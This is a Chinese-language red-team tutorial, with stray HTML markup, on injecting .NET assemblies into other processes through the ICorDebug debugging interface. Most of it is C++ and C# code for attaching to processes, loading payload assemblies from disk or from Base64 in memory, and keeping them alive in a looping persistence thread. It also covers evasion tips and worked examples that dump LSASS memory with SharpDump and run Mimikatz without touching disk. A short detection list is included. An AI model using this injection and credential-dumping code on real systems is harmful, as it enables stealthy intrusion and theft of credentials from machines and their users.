深入挖掘.NET注入技术：利用ICorDebug实现托管代码注入<\/h1>

前言<\/h2>
.NET注入技术长期以来一直用于后渗透开发，与大多数C2框架捆绑在一起。传统方法通常涉及将shellcode或DLL注入非托管空间，然后加载CLR来执行.NET代码。本文介绍一种创新的方法，通过直接利用.NET调试接口ICorDebug在目标进程中执行任意.NET方法，无需传统的注入技术。<\/p>

ICorDebug简介<\/h2>
ICorDebug是.NET框架提供的调试API，允许开发者以编程方式控制和检查.NET进程的执行。与Visual Studio的调试功能类似，ICorDebug提供了丰富的接口来：<\/p>
附加到运行中的.NET进程<\/li>
控制执行流程（暂停、继续、单步执行）<\/li>
检查和修改程序状态<\/li>
在目标进程中评估表达式和方法<\/li> <\/ul>
创建调试器环境<\/h2>

1. 初始化ICorDebug接口<\/h3>
首先需要确定并初始化目标.NET运行时版本：<\/p>
ICLRMetaHost*<\/span> metaHost;
<\/span><\/span>ICLRRuntimeInfo*<\/span> runtimeInfo;
<\/span><\/span>HRESULT hr;
<\/span><\/span>
<\/span><\/span>\/\/ 创建CLR元主机实例
<\/span><\/span><\/span><\/span>if<\/span> ((hr =<\/span> CLRCreateInstance(CLSID_CLRMetaHost, IID_ICLRMetaHost, (LPVOID*<\/span>)&<\/span>metaHost)) !=<\/span> S_OK) {
<\/span><\/span>    return<\/span> hr;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 枚举已安装的运行时
<\/span><\/span><\/span><\/span>IEnumUnknown*<\/span> runtime;
<\/span><\/span>if<\/span> ((hr =<\/span> metaHost-><\/span>EnumerateInstalledRuntimes(&<\/span>runtime)) !=<\/span> S_OK) {
<\/span><\/span>    return<\/span> hr;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 获取运行时信息并选择合适版本
<\/span><\/span><\/span><\/span>while<\/span> (runtime-><\/span>Next(1<\/span>, &<\/span>enumRuntime, 0<\/span>) ==<\/span> S_OK) {
<\/span><\/span>    if<\/span> (enumRuntime-><\/span>QueryInterface<<\/span>ICLRRuntimeInfo><\/span>(&<\/span>runtimeInfo) ==<\/span> S_OK) {
<\/span><\/span>        runtimeInfo-><\/span>GetVersionString(frameworkName, &<\/span>bytes);
<\/span><\/span>        wprintf(L<\/span>"[*] Supported Framework: %s<\/span>\n<\/span>"<\/span>, frameworkName);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 创建调试器实例<\/h3>
ICorDebug*<\/span> debug;
<\/span><\/span>ICorDebugProcess*<\/span> process;
<\/span><\/span>
<\/span><\/span>\/\/ 获取ICorDebug接口
<\/span><\/span><\/span><\/span>if<\/span> ((hr =<\/span> runtimeInfo-><\/span>GetInterface(CLSID_CLRDebuggingLegacy, IID_ICorDebug, (LPVOID*<\/span>)&<\/span>debug)) !=<\/span> S_OK) {
<\/span><\/span>    return<\/span> hr;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 初始化调试器
<\/span><\/span><\/span><\/span>debug-><\/span>Initialize();
<\/span><\/span>
<\/span><\/span>\/\/ 附加到目标进程
<\/span><\/span><\/span><\/span>debug-><\/span>DebugActiveProcess(targetPid, false, &<\/span>process);
<\/span><\/span><\/code><\/pre>调试器事件处理<\/h2>
调试器通过回调接口与目标进程交互。我们需要实现ICorDebugManagedCallback<\/code>来处理各种调试事件：<\/p>
class<\/span> ManagedCallback<\/span> :<\/span> public<\/span> ICorDebugManagedCallback, public<\/span> ICorDebugManagedCallback2 {
<\/span><\/span>public<\/span>:<\/span>
<\/span><\/span>    \/\/ 处理断点事件
<\/span><\/span><\/span><\/span>    HRESULT Breakpoint(ICorDebugAppDomain*<\/span> pAppDomain, ICorDebugThread*<\/span> pThread, ICorDebugBreakpoint*<\/span> pBreakpoint);
<\/span><\/span>    
<\/span><\/span>    \/\/ 处理步进完成事件
<\/span><\/span><\/span><\/span>    HRESULT StepComplete<\/span>(ICorDebugAppDomain*<\/span> pAppDomain, ICorDebugThread*<\/span> pThread, ICorDebugStepper*<\/span> pStepper, CorDebugStepReason reason);
<\/span><\/span>    
<\/span><\/span>    \/\/ 处理评估完成事件
<\/span><\/span><\/span><\/span>    HRESULT EvalComplete<\/span>(ICorDebugAppDomain*<\/span> pAppDomain, ICorDebugThread*<\/span> pThread, ICorDebugEval*<\/span> pEval);
<\/span><\/span>    
<\/span><\/span>    \/\/ 处理线程创建事件
<\/span><\/span><\/span><\/span>    HRESULT CreateThread<\/span>(ICorDebugAppDomain*<\/span> pAppDomain, ICorDebugThread*<\/span> thread<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 其他必要的事件处理方法...
<\/span><\/span><\/span><\/span>};
<\/span><\/span>
<\/span><\/span>\/\/ 设置回调处理器
<\/span><\/span><\/span><\/span>ManagedCallback*<\/span> handler =<\/span> new<\/span> ManagedCallback();
<\/span><\/span>debug-><\/span>SetManagedHandler(handler);
<\/span><\/span><\/code><\/pre>关键注入技术<\/h2>
1. 寻找GC安全点<\/h3>
要在目标进程中执行代码，必须找到GC安全点（GC safe point）。这是JIT编译器插入的特殊位置，允许安全地执行垃圾回收和代码评估。<\/p>
HRESULT ManagedCallback::<\/span>StepComplete(ICorDebugAppDomain*<\/span> pAppDomain, ICorDebugThread*<\/span> pThread, ICorDebugStepper*<\/span> pStepper, CorDebugStepReason reason) {
<\/span><\/span>    ICorDebugEval*<\/span> eval;
<\/span><\/span>    bool<\/span> stepAgain =<\/span> false;
<\/span><\/span>    
<\/span><\/span>    \/\/ 创建评估实例
<\/span><\/span><\/span><\/span>    if<\/span> (pThread-><\/span>CreateEval(&<\/span>eval) !=<\/span> S_OK) {
<\/span><\/span>        stepAgain =<\/span> true;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 尝试创建字符串对象测试是否处于安全点
<\/span><\/span><\/span><\/span>    if<\/span> (eval-><\/span>NewString(L<\/span>"Test"<\/span>) !=<\/span> S_OK) {
<\/span><\/span>        stepAgain =<\/span> true;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 根据结果决定是否继续步进
<\/span><\/span><\/span><\/span>    if<\/span> (stepAgain) {
<\/span><\/span>        pStepper-><\/span>Step(0<\/span>);
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        pStepper-><\/span>Deactivate();
<\/span><\/span>        \/\/ 可以在此处执行目标代码
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    pAppDomain-><\/span>Continue(false);
<\/span><\/span>    return<\/span> S_OK;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 加载.NET程序集<\/h3>
一旦找到安全点，可以加载并执行.NET程序集：<\/p>
\/\/ 1. 查找Assembly.LoadFile方法
<\/span><\/span><\/span><\/span>ICorDebugFunction*<\/span> function;
<\/span><\/span>if<\/span> (FindMethod(&<\/span>function, pAppDomain, L<\/span>"mscorlib.dll"<\/span>, 
<\/span><\/span>              L<\/span>"System.Reflection.Assembly"<\/span>, L<\/span>"LoadFile"<\/span>) !=<\/span> S_OK) {
<\/span><\/span>    return<\/span> E_FAIL;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 2. 创建路径字符串参数
<\/span><\/span><\/span><\/span>ICorDebugValue*<\/span> pathValue;
<\/span><\/span>eval-><\/span>NewString(L<\/span>"C:<\/span>\\<\/span>payload.dll"<\/span>, &<\/span>pathValue);
<\/span><\/span>
<\/span><\/span>\/\/ 3. 调用LoadFile方法
<\/span><\/span><\/span><\/span>eval-><\/span>CallFunction(function, 1<\/span>, &<\/span>pathValue);
<\/span><\/span><\/code><\/pre>3. 内存加载程序集<\/h3>
为避免磁盘I\/O，可以从内存加载Base64编码的程序集：<\/p>
\/\/ 1. 创建Base64字符串
<\/span><\/span><\/span><\/span>eval-><\/span>NewString(BASE64_ENCODED_ASSEMBLY, &<\/span>base64Value);
<\/span><\/span>
<\/span><\/span>\/\/ 2. 调用Convert.FromBase64String
<\/span><\/span><\/span><\/span>ICorDebugFunction*<\/span> fromBase64;
<\/span><\/span>FindMethod(&<\/span>fromBase64, pAppDomain, L<\/span>"mscorlib.dll"<\/span>, 
<\/span><\/span>          L<\/span>"System.Convert"<\/span>, L<\/span>"FromBase64String"<\/span>);
<\/span><\/span>eval-><\/span>CallFunction(fromBase64, 1<\/span>, &<\/span>base64Value);
<\/span><\/span>
<\/span><\/span>\/\/ 3. 在EvalComplete回调中获取字节数组结果
<\/span><\/span><\/span><\/span>ICorDebugValue*<\/span> byteArray;
<\/span><\/span>pEval-><\/span>GetResult(&<\/span>byteArray);
<\/span><\/span>
<\/span><\/span>\/\/ 4. 调用Assembly.Load(byte[])
<\/span><\/span><\/span><\/span>ICorDebugFunction*<\/span> loadMethod;
<\/span><\/span>FindMethod(&<\/span>loadMethod, pAppDomain, L<\/span>"mscorlib.dll"<\/span>, 
<\/span><\/span>          L<\/span>"System.Reflection.Assembly"<\/span>, L<\/span>"Load"<\/span>);
<\/span><\/span>eval-><\/span>CallFunction(loadMethod, 1<\/span>, &<\/span>byteArray);
<\/span><\/span><\/code><\/pre>目标进程选择策略<\/h2>
1. 标准注入目标<\/h3>
选择活跃的.NET进程，如mmc.exe<\/code>（事件查看器）：<\/p>
STARTUPINFOW si;
<\/span><\/span>PROCESS_INFORMATION pi;
<\/span><\/span>memset(&<\/span>si, 0<\/span>, sizeof<\/span>(STARTUPINFOA));
<\/span><\/span>si.cb =<\/span> sizeof<\/span>(STARTUPINFOA);
<\/span><\/span>CreateProcessW(
<\/span><\/span>    L<\/span>"C:<\/span>\\<\/span>Windows<\/span>\\<\/span>System32<\/span>\\<\/span>eventvwr.exe"<\/span>,
<\/span><\/span>    NULL, NULL, NULL, false, 
<\/span><\/span>    CREATE_NEW_CONSOLE, NULL, NULL, &<\/span>si, &<\/span>pi);
<\/span><\/span><\/code><\/pre>2. 定制注入目标<\/h3>
利用AddInProcess.exe<\/code>等.NET进程的特定行为：<\/p>

通过命名管道触发代码执行<\/li>
利用进程监视功能保持持久性<\/li>
<\/ul>
3. 进程创建注入<\/h3>
直接创建新进程并附加调试器：<\/p>
debug-><\/span>CreateProcessW(
<\/span><\/span>    L<\/span>"C:<\/span>\\<\/span>Windows<\/span>\\<\/span>Microsoft.NET<\/span>\\<\/span>Framework64<\/span>\\<\/span>v4.0.30319<\/span>\\<\/span>AddInUtil.exe"<\/span>,
<\/span><\/span>    NULL, NULL, NULL, false, 
<\/span><\/span>    CREATE_NEW_CONSOLE, NULL, NULL,
<\/span><\/span>    &<\/span>si, &<\/span>pi, (CorDebugCreateProcessFlags)0<\/span>, &<\/span>process);
<\/span><\/span><\/code><\/pre>持久化技术<\/h2>
确保注入代码在目标进程退出后继续运行：<\/p>
\/\/ 示例.NET payload<\/span>
<\/span><\/span>namespace<\/span> Injected {
<\/span><\/span>    class<\/span> Injected<\/span> {
<\/span><\/span>        public<\/span> static<\/span> void<\/span> ThreadEntry() {
<\/span><\/span>            while<\/span>(true<\/span>) {
<\/span><\/span>                \/\/ 恶意代码<\/span>
<\/span><\/span>                Thread.Sleep(1000<\/span>);
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>        
<\/span><\/span>        public<\/span> static<\/span> void<\/span> Entry() {
<\/span><\/span>            \/\/ 创建前台线程阻止进程退出<\/span>
<\/span><\/span>            var<\/span> thread = new<\/span> System.Threading.Thread(new<\/span> ThreadStart(ThreadEntry));
<\/span><\/span>            thread.Start(); 
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>检测与规避<\/h2>
检测点<\/h3>


调试器附加痕迹<\/strong>：<\/p>

DebugActiveProcess<\/code> API调用<\/li>
ntdll!DbgUiRemoteBreakin<\/code>线程入口点<\/li>
Sysmon事件ID 8（CreateRemoteThread）<\/li>
<\/ul>
<\/li>

进程修改<\/strong>：<\/p>

WriteProcessMemory<\/code>调用<\/li>
异常的内存区域<\/li>
<\/ul>
<\/li>

调试器存在<\/strong>：<\/p>

CheckRemoteDebuggerPresent<\/code>可检测活动调试会话<\/li>
进程属性中的调试标志<\/li>
<\/ul>
<\/li>
<\/ol>
规避技术<\/h3>


使用COMPlus<\/code>环境变量优化JIT行为：<\/p>

COMPlus_JITMinOpts=1<\/code> - 禁用最小优化<\/li>
COMPlus_ZapDisable=1<\/code> - 禁用原生映像生成<\/li>
<\/ul>
<\/li>

快速分离调试器：<\/p>
\/\/ 停止所有步进器
<\/span><\/span><\/span>\/\/ 完成所有评估
<\/span><\/span><\/span><\/span>debug-><\/span>Detach();
<\/span><\/span><\/code><\/pre><\/li>

选择低检测率的进程注入点<\/p>
<\/li>
<\/ol>
参考资源<\/h2>

Windows Exploitation Tricks: Abusing the Debug Object<\/a><\/li>
Windows Debugging Framework Documentation<\/a><\/li>
GC Pauses and Safe Points<\/a><\/li>
NetCoreDbg - .NET Core Debugger<\/a><\/li>
<\/ol>
实际应用示例<\/h2>
1. 执行SharpDump转储LSASS内存<\/h3>
\/\/ 加载SharpDump程序集
<\/span><\/span><\/span><\/span>eval-><\/span>NewString(L<\/span>"c:<\/span>\\<\/span>tools<\/span>\\<\/span>SharpDump.exe"<\/span>, &<\/span>pathValue);
<\/span><\/span>FindMethod(&<\/span>loadFile, pAppDomain, L<\/span>"mscorlib.dll"<\/span>, 
<\/span><\/span>          L<\/span>"System.Reflection.Assembly"<\/span>, L<\/span>"LoadFile"<\/span>);
<\/span><\/span>eval-><\/span>CallFunction(loadFile, 1<\/span>, &<\/span>pathValue);
<\/span><\/span>
<\/span><\/span>\/\/ 调用入口方法
<\/span><\/span><\/span><\/span>FindMethod(&<\/span>entry, pAppDomain, L<\/span>"SharpDump.exe"<\/span>, 
<\/span><\/span>          L<\/span>"SharpDump.Program"<\/span>, L<\/span>"Main"<\/span>);
<\/span><\/span>eval-><\/span>CallFunction(entry, 0<\/span>, NULL);
<\/span><\/span><\/code><\/pre>2. 无文件注入Mimikatz<\/h3>
\/\/ 从内存加载Base64编码的Mimikatz
<\/span><\/span><\/span><\/span>eval-><\/span>NewString(MIMIKATZ_BASE64, &<\/span>base64Value);
<\/span><\/span>FindMethod(&<\/span>fromBase64, pAppDomain, L<\/span>"mscorlib.dll"<\/span>, 
<\/span><\/span>          L<\/span>"System.Convert"<\/span>, L<\/span>"FromBase64String"<\/span>);
<\/span><\/span>eval-><\/span>CallFunction(fromBase64, 1<\/span>, &<\/span>base64Value);
<\/span><\/span>
<\/span><\/span>\/\/ 调用Assembly.Load
<\/span><\/span><\/span><\/span>FindMethod(&<\/span>load, pAppDomain, L<\/span>"mscorlib.dll"<\/span>, 
<\/span><\/span>          L<\/span>"System.Reflection.Assembly"<\/span>, L<\/span>"Load"<\/span>);
<\/span><\/span>eval-><\/span>CallFunction(load, 1<\/span>, &<\/span>byteArray);
<\/span><\/span>
<\/span><\/span>\/\/ 执行Mimikatz
<\/span><\/span><\/span><\/span>FindMethod(&<\/span>entry, pAppDomain, L<\/span>"mimikatz.exe"<\/span>, 
<\/span><\/span>          L<\/span>"Program"<\/span>, L<\/span>"Main"<\/span>);
<\/span><\/span>eval-><\/span>CallFunction(entry, 0<\/span>, NULL);
<\/span><\/span><\/code><\/pre>总结<\/h2>
通过ICorDebug接口实现.NET注入提供了多种优势：<\/p>

完全在托管环境中操作，避免传统注入技术的检测<\/li>
无需加载非托管代码或shellcode<\/li>
可直接调用任意.NET方法，灵活性高<\/li>
支持多种注入场景（现有进程、新进程、特定行为触发）<\/li>
<\/ol>
这种技术特别适合红队操作，能够有效规避许多基于传统注入技术的检测机制。理解这些原理也有助于蓝队开发更有效的检测方法。<\/p>